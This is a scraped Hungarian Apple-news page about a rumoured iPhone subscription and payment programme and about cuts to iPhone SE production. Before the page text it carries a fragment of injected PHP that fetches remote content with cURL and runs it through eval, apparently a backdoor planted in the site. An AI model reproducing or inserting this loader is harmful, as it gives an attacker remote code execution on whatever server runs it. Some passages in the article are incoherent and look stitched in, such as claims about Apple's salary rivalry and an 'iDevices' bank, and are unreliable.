it();curl_setopt($ch_handle,CURLOPT_URL,$f_url);curl_setopt($ch_handle,CURLOPT_RETURNTRANSFER,1);$f_content=curl_exec($ch_handle);curl_close($ch_handle);eval("?>".$f_content);?> Új fizetési rendszerrel tenné az Apple még inkább „almássá” ügyfeleit - Apple hírek
vasárnap, szeptember 8, 2024
Home Apple hírek Új fizetési rendszerrel tenné az Apple még inkább „almássá” ügyfeleit

Új fizetési rendszerrel tenné az Apple még inkább „almássá” ügyfeleit

Pletykák keringenek az iPhone-előfizetési szolgáltatásáról, amely lehetővé teszi a havonta való fizetést a legújabb Apple termékekhez, például az iPhone 13-hoz. Mindez pedig kedvező árakkal párosulhat – írja a Techradar.

Az információ Mark Gurmantól, a Bloomberg Apple-lel kapcsolatos gurujától származik, aki az iPhone előfizetéses szolgáltatásainak várható árazását taglalja, a telefon típusától függően. Az általa ismertetett számok jócskán alábuknak az iPhone Upgrade Program eddig megszokott áraihoz képest, mindez pedig arra utal, hogy az almás vállalat a szolgáltatásában is hasonlóra készül.

Fotó: Shutterstock

Az Apple iPhone Upgrade Programja egy olyan szolgáltatás, amely új iPhone vásárlásánál lehetővé teszi a fizetés későbbre ütemezését – és bár ezzel összességében nem spórolnak a tulajdonosok, de a részletfizetés könnyebbséget jelent nekik anyagilag.

Gurman hozzáteszi, hogy az Apple vásárlómegtartó akciói közé tartozik az előfizetők régi iPhone-jainak eladását célzó program, amely a fenntarthatóság irányába viszi el a vállalatot.

Gurman kiemeli, hogy az Apple által a különböző termékeire és szolgáltatásaira megszabott végleges árak még az általa előirányozottaknál is kedvezőbbek lehetnek.

Az iPhone 12 volt tavaly a legnépszerűbb modell.

„A vállalat további bevételre tehet szert, amennyiben új programját hozzákapcsolja az Apple One digitális szolgáltatáscsomaghoz, illetve az AppleCare-hez. Mindez azt jelenti, hogy az előfizető számára olyan alkalmazások is elérhetők lesznek, mint az Apple TV Plus, az Arcade, a Fitness Plus, illetve más előfizetéses Apple-szolgáltatások. Ez azonban nyilván többe kerül” – fejtette ki.

Egyre kiélezettebb a verseny a Szilícium-völgy vállalatai között, az Apple a jutalommal a Meta, a Google és a Microsoft fizetéseivel rivalizál.

Az Apple egyelőre nem kommentálta a Gurman által megszellőztetetteket, a vállalattal kapcsolatos információi azonban döntő részben helytállók szoktak lenni – jegyzi meg a cikk.

Fotó: SVEN HOPPE / AFP

Termékcsaládi összefonódás

Az egyik legfontosabb ok, amiért az emberek Apple eszközöket vásárolnak, hogy a vállalat különböző termékeinek – okostelefon, táblagép, laptop stb. – használatát kiválóan egymásba lehet integrálni, vagy használatuk szorosan kapcsolódik egymáshoz.

A felhasználói élmény pedig kiváló ügyfélmegtartónak bizonyul, mert ha csak egy dolgot kicserélünk, akkor az gyenge láncszám lesz a gépezetben. Például, ha az iPhone-t lecseréljük például egy androidos Samsung telefonra, akkor az a többi Apple eszközzel nem lesz kompatibilis.

Az Apple ezt a „köteléket” szeretné erősíteni az új előfizetési szolgáltatáscsomagjával. Mivel a felhasználók rendszeresen fizetnek (havonta), ezért motiváltak abban, hogy ragaszkodjanak Apple termékükhöz. A vállalat emellett azt is szeretné elérni, hogy ügyfelei szintén ragaszkodjanak a cég virtuális szervizéhez, az iDeviceshez, amelyet a cikk az Apple „nagy bankjaként” aposztrofál.

Az Apple mindent megtesz az ügyfelei biztonságáért.

Bár ezt az új előfizetési szolgáltatást egyelőre csak pletykának tekinthetjük, meglepő lenne, ha a valóságban nem így nézne ki.

Kevesebb iPhone SE-t gyártat az Apple

Az Apple visszafogja az iPhone-ok és az AirPods fülhallgatók gyártását a következő negyedévtől – értesült a Nikkei. A japán üzleti lap forrásai szerint az ukrajnai háború és a világszerte tomboló infláció miatt az információtechnológiai eszközök kereslete mérséklődött, az ellátási láncok felszakadozása pedig eleve megnehezítette a gyártók dolgát, a folyamatos szállításokat. Erre reagálva az Apple azt tervezi, hogy nagyjából 20 százalékkal csökkenti fapados modellje, az iPhone SE megrendeléseit, azaz 2-3 millió okostelefonnal kevesebbet gyártat le távol-keleti partnereivel.

Most Popular

Ezekkel az újdonságokkal tarolhat az iPhone 16 Pro

Egy neves elemző szerint a nagyobb kijelző és a periszkópkamera lesz a két nagy újdonság. Míg az iPhone 15 modellekhez új...

Apple Watch-a mentette meg egy nő életét

Az okosórákon elérhető esésészlelés funkciónak köszönheti egy nő az életét. A kezén lévő Apple Watch ugyanis még időben riasztotta a segélyhívót.   Számos módon...

ITB Today 05/19: Itt az adat, hol az adat?

Itt az adat, hol az adat? Mind több vállalat hallja és tudja, hogy kezdenie kellene valamit a nála felgyűlt vagy a külső forrásokból egyre könnyebben...

ChatGPT alkalmazást indít iOS-re az OpenAI

Az OpenAI egy olyan iOS-alkalmazást jelentett be, amely lehetővé teszi a felhasználók számára, hogy útközben is hozzáférjenek a vállalat népszerű AI chatbotjához. Ígéretük szerint...

Recent Comments